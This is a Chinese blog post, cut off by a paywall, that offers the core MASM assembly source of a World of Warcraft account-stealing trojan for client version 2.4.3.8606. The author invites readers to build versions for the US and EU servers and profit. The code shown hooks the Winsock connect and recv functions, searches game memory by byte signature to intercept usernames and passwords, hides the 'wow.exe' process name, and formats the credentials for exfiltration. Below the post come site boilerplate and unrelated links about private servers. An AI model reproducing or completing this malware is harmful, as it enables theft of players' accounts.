欧服WOW木马核心源代码,游戏版本v2.4.3.8606

最新推荐文章于 2023-06-04 18:34:36 发布
最新推荐文章于 2023-06-04 18:34:36 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: 游戏 hook null api dll byte
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/3078621
版权
 对应游戏版本v2.4.3.8606。这个只是核心代码,而非完整代码,通过调式完全可以写出美服跟欧服的WOW马来,大家发财去吧

Quote:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;                Programmed by asm, MSN:asm32@live.cn                          ;
;                  WOWGameMaker For WOW_MF_OF                                  ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;0041DAEA  |.  5E            pop    esi                <-------------特征码位置+12=断点位置
;0041DAEB  |.  33CD          xor    ecx, ebp
;0041DAED  |.  5B            pop    ebx
;0041DAEE  |.  E8 E7CAFEFF  call    0040A5DA
;0041DAF3  |.  8BE5          mov    esp, ebp
;0041DAF5  |.  5D            pop    ebp                <-------------断点位置
;0041DAF6  /.  C2 0400      retn    4                  <-------------ret执行后,游戏会跳转到005B55B4h这里执行。因此在木马里要
;搜索这个地址得特征码从而得到通用得地址,而不是直接采用硬编码 = =。再得到通用得地址后执行 mov eax,hJmpEip/jmp eax即可

;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h

;005B55B4      8B4D FC      mov    ecx, dword ptr [ebp-4]    <-----------------得到要跳转的地址
;005B55B7      5F            pop    edi
;005B55B8      5E            pop    esi
;005B55B9  |.  33CD          xor    ecx, ebp
;005B55BB  |.  5B            pop    ebx
;005B55BC  |.  E8 1950E5FF  call    0040A5DA
;005B55C1      8BE5          mov    esp, ebp

;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
;----------------------------------------------------------------------------------------------------------------
.486
.model flat,stdcall
option casemap:none
include debug.inc
include        windows.inc
include        user32.inc
includelib        user32.lib
include        kernel32.inc
includelib        kernel32.lib
include        advapi32.inc
includelib        advapi32.lib
include        comctl32.inc
includelib        comctl32.lib
include        psapi.inc
includelib        psapi.lib
IncludeLib Masm32.lib
Include Masm32.inc
include    Shlwapi.inc
includelib  Shlwapi.lib
include    shell32.inc
includelib  shell32.lib
include macros.inc
includelib mylib.lib
include        wininet.inc
includelib    wininet.lib
HOOKAPI struct
a  byte 0B8h
PMyapi DWORD 0
d BYTE 0FFh
e BYTE 0E0h
HOOKAPI ends

MODULEINFO struct

lpBaseOfDll dword 0
SizeOfImage dword 0
EntryPoint dword 0

MODULEINFO ends
F_STOP                equ        0002h

;子程序声明

HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD
WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD
MyHookFunToGetUserAndPass proto  :DWORD  ,:DWORD,:DWORD
MyConnect  proto  :DWORD  ,:DWORD,:DWORD;,:DWORD
MyRecv proto  :DWORD  ,:DWORD,:DWORD,:DWORD
GetApi proto  :DWORD,:DWORD
BakDll proto  :DWORD,:DWORD

AntiFileToRun proto c :DWORD
BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
LoadModuleEx proto c :DWORD
GetModuleImageSize proto c :DWORD
CaleHookPointerWOW proto c
ExtractFileName proto c :DWORD
ExtractFilePath proto c :DWORD

;已初始化数据
.data
hInstance dd 0
WProcess dd 0

Papi1 DWORD ?
Papi2 DWORD ?
Papi3 DWORD ?
WritBak1 HOOKAPI <>
WritBak2 HOOKAPI <>
ApiBak1 db 10 dup(?)
ApiBak2 db 10 dup(?)
DllName1  db "ws2_32.dll",0
ApiName1  db "connect",0
ApiName2  db "recv",0
ApiName3 db "hook",0
szWowprocess db "g&mpm",0  ;wow.exe加密
Dllbase1 DWORD ?
NowDllbase1 DWORD ?
NowDllbase2 DWORD ?
dwTemp dd ?
hAdress dd ?
;Dllbase2 DWORD ?
;NowDllbase2 DWORD ?
hRecvBak dd ?
hRecv dd ?
szJmp db  0C2h,04h,00h,0cch,0cch,0cch,0cch  ;恢复
szJmpRecv db  8Bh,0FFh,55h,8Bh,0ECh,83h,0ECh, 10h,53h,33h,0DBh,81h,3Dh, 28h,40h,0A3h,71h,56h,0Fh,84h, 5Eh,50h,00h,00h
szWOWFmt db "wowu=%s&wowp=%s&wowf=%s",13,10,13,10,0
szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
szEbpEnter db 6Ah, 40h, 5
最低0.47元/天 解锁文章
iiprogram
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
tbc-db:mangos-tbc和《魔兽世界客户端补丁》 2.4.3的内容数据库
03-06
用于CMaNGOS / mangos-tbc的TBC-DB 一个供使用的内容数据库,以及《魔兽世界客户端补丁》 2.4.3- 。 它仅与客户端2.4.3(内部版本8606)兼容。 TBC-DB在GPL v3下发布。 该文件( LICENSE.md )必须是此软件制作的任何可再发行程序包的一部分。 如果要制作可再发行的副本,则不得从此软件中删除任何许可证。 TBC-DB包含的版权材料不属于GPL v3。 有关受版权保护的材料的信息位于文件( COPYRIGHT.md )中。 魔兽世界的内容和材料是暴雪或其许可方的商标和版权。 版权所有。 TBC-DB是CMaNGOS项目的一部分,与暴雪或其许可方无关。 兼容性 TBC-DB数据库仅与核心兼容。 入门 该数据库存储库的基本原理是拥有一个SQL文件,该文件保存数据库中的每个表。 将某些内容更改为数据库后,将通过在updates目录中添加
OregonCore:魔兽世界2.4.3服务器模拟器
02-05
欢迎来到OregonCore! OregonCore是一款旨在模拟《魔兽世界:燃烧远征》游戏服务器的软件。 我们的目标是创建一个稳定的MMO框架,并帮助我们社区中的教与学发展。 OregonCore依靠紧密的开发人员,测试人员和错误报告者社区来维持自己的生命,并感谢多年来参与该项目的所有人。 建立状态 编译器 平台 环境 状态 gcc / g ++ Linux x64 埃鲁纳残疾人 gcc / g ++ Linux x64 启用Eluna lang / c ++ Linux x64 埃鲁纳残疾人 lang / c ++ Linux x64 启用Eluna 文档,社区和支
魔兽世界服务器修改模型,超简单魔兽世界修改模型 2.43可用 无需登录器
weixin_26908317的博客
08-11 5658
准备工作:所需软件WINHEX,百度一下就有,华军什么的也可以。还有就是反向十六进制代码转换器。另外还需要一个代码查询网站http://wow.allakhazam.com/。打开网站点“search”。然后将语言选择为中文,输入要查询的装备的名称查询。然后点所需装备的连接,在出现的网页中点XML。拖动网页,会看见一片数字,其他的不管,只需要2个displayinfo中间的数字,例如,逐风剑的就是...
ARCEmu项目wow私服服务器网络模块分析(四)
10-12 5703
线程池: /* * Thread Pool Class * Copyright (C) Burlex * * This program is free software: you can redistribute it and/or modify * it unde
目前最完美的魔兽世界服务端AzerothCore,Window系统小白10分钟搭建教程
热门推荐
09-12 3万+
首先下载服务端文件: 魔兽世界无限制服务端,巫妖王之怒,window版 - 阿里云盘资源分享 - 单机游戏免费下载 - 幻想游戏,幻想社区http://3a.hxyou.cn/softs/1134.html 原版AzerothCore编译,仿官方,集成Lua,无人数限制,无机器限制, 可能是目前修复最好的魔兽服务端了! 包含地图文件和数据库(已汉化),傻瓜式安装,一键启动 服务器推荐:尊云 68/月 系统推荐:Window Server 2019 详细搭建步骤: 将文件上传到服.
DirectX版本WOW魔兽世界游戏客户端源码.zip
01-24
这个"DirectX版本WOW魔兽世界游戏客户端源码.zip"文件很可能包含的是魔兽世界游戏客户端的部分源代码,这些源代码可能涉及到了DirectX的使用,用于游戏的图形渲染、音频处理以及与玩家输入设备的交互。源码分析...
WOW.js-元素在页面滚动时展示CSS3动画JS插件特效代码
03-20
WOW.js 是一个非常流行的JavaScript库,它使得网页上的元素能够在用户滚动页面时触发CSS3动画效果,从而创造出引人注目的用户体验。这款插件的设计理念是将视觉吸引力与用户交互紧密结合,使得网页内容在适时的时候...
Altoholic_Vanilla:用于Vanilla WoW 1.12的Altoholic-从最初由Thaoky编写的2.4.015版本向后移植
05-15
用于Vanilla WoW 1.12的Altoholic-从最初由Thaoky编写的2.4.015版本向后移植 请注意: 请使用报告错误! 屏幕截图: 特征: 支持的语言:英语和法语。 尽管它尚未完全针对frFR进行本地化,但在法国客户上的确...
iOS游戏应用源代码——mikechambers-WoWTCGUtility-desktop.zip
最新发布
07-05
此项目旨在为iOS用户提供一个桌面版本游戏辅助工具,特别是针对流行的《魔兽世界:集换式卡牌游戏》(World of Warcraft Trading Card Game, WoW TCG)。通过分析源代码,我们可以了解到iOS应用开发的关键技术、...
wow.js.zip
07-14
WOW.js的核心功能是检测元素何时进入浏览器的视口,并触发预定义的CSS动画。 2. **视差滚动**:视差滚动是一种网页设计技术,通过使背景元素以不同的速度移动,形成深度感,增加用户的沉浸式体验。WOW.js就是利用...
在线游戏网站(魔兽世界)网页模板
08-18
在线游戏网站(魔兽世界)网页模板 京华志&精华志出品 希望大家互相学习,互相进步 支持CSDN 支持微软 主要包括C# ASP.NET SQLDBA 源码 毕业设计 开题报告 答辩PPT等等好多知识
魔兽世界终极版源代码
07-10
北京大学程序设计实习大作业源代码
TBC2.43-WOW-EXE
01-20
TBC2.43版本官方启动器,由于恢复SF破坏的文件
linux编译trinitycore,[MAC] 编译安装和测试《魔兽世界》模拟服务端 TrinityCore
weixin_36448083的博客
05-11 689
1. 安装编译环境和依赖项客户端安装:下载地址(3.3.5a enUS),安装到:/Applications/World of Warcraft 目录下(后面会用到)安装Xcode:自行到 App Store 下载,完成之后需要执行 xcodeselect --install 来安装 command line tools安装homebrew:ruby-e"$(curl-fsSLhtt...
魔兽世界服务端端新手搭建教程
用最简单的方式说最重要的事!服务器、存储、云计 算、A智能的大数据产品、游戏开发技术。致力于广 大开发者、政企用户、各项机构等,构建云上世界提供全方位云计算解决方案。旨在打造差异化的开放式闭环生态系统帮助用户快速构建稳定、安全的云计算环境。
02-21 4006
去不排除的服和单机没啥区别,以怀旧服玩到10级以后就开始玩335端,一开始也和新入手的人一样云里雾里的,明杰也是很久以前开始研究魔兽服务器架设,主要原因是亚服经常要排队6-7个小时,经过长时间的学习总算有点成就,一、服务端架设新手向内容。1. 335端的架设。
魔兽世界私服Trinity,从源码开始
mysouling的专栏
05-08 3万+
缘起因由 在一个无所事事的周末下午,突然想起魔兽世界,官方的账号很久没有上了,里面的大小号现在连满级都不是。以前曾经搭过传奇和星际争霸战网的私服自娱自乐,也听说过魔兽世界有开源的服务端模拟,既然兴致来了就小小的研究一下。 目前魔兽世界的私服比较流行的是MaNGOS和Trinity,二者都是模拟魔兽世界服务端。MaNGOS“号称”是一个研究型项目,目的是为了学习大规模的C++项目开发,有
魔兽世界AC服务端编译搭建(github开源项目)-含lua和机器人模块
qq_36006156的博客
06-04 1341
AC魔兽服务端二进制、docker(未更新)部署
利用TrinityCore 框架的搭建魔兽世界私服
战斗果冻的训练中心
02-27 4876
TrinityCore 框架的搭建 框架信息 Github页https://github.com/TrinityCore/TrinityCore/releases 官网https://github.com/TrinityCore/TrinityCore/releases 服务器配置 双核心4G,debian 11.1 安装mysql 安装 mysql(版本5.7),据说是因为官网说的那个mariadb安装因为版本问题容易报错 wget [http://repo.mysql.com/mysql-apt-con
网游服务器搭建方案图解(以魔兽世界为例)
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
10-03 2372
国服的巫妖王终于开了,而服务器“卡”的问题再次由于人数暴增而显现出来。下面小编就给大家介绍一下网络游戏的服务器搭建方案,也许大家能稍微理解一下服务器的苦衷。这么多新号,看着像开追悼会似的!如火如荼的网络游戏产业正吸引着各方的眼光,这其中也包括正迫切寻找新的利润增长点的电信运营商。
nuxt3 如何引入wow.js
06-09
要在Nuxt 3中引入wow.js,可以按照以下步骤操作: 1. 安装wow.js和animate.css 可以使用npm或yarn安装wow.js和animate.css: ``` npm install wowjs animate.css ``` 或 ``` yarn add wowjs animate.css ``` 2. 创建一个插件文件 在Nuxt 3中,可以使用插件文件来引入第三方库。创建一个新的文件`wow.js`,并将以下代码添加到文件中: ``` import { createApp } from 'vue' import WOW from 'wowjs' export default function (context, inject) { const app = createApp() app.directive('wow', WOW.wow) inject('wow', WOW) } ``` 在这个插件文件中,我们首先使用`createApp`函数创建一个Vue实例。然后,我们使用Vue的`directive`方法将WOW.js的指令`wow`添加到Vue的指令系统中。最后,我们使用Nuxt 3的`inject`方法将WOW.js注入到Nuxt 3应用程序中。 3. 在nuxt.config.js中引入插件 打开`nuxt.config.js`文件,在`plugins`数组中添加以下代码: ``` { src: '~/plugins/wow.js', mode: 'client' } ``` 这将在客户端模式下引入插件。 4. 在组件中使用WOW.js 现在,您可以在组件中使用WOW.js了。在需要使用WOW.js的组件中,您可以按照以下步骤操作: 首先,使用`this.$wow.init()`方法初始化WOW.js: ``` export default { mounted() { this.$wow.init() } } ``` 然后,您可以在需要使用WOW.js的元素上添加`wow`指令: ``` <template> <div class="wow fadeIn" v-wow> ... </div> </template> ``` 现在,当这个组件被挂载时,WOW.js将自动在带有`wow`指令的元素上应用动画效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值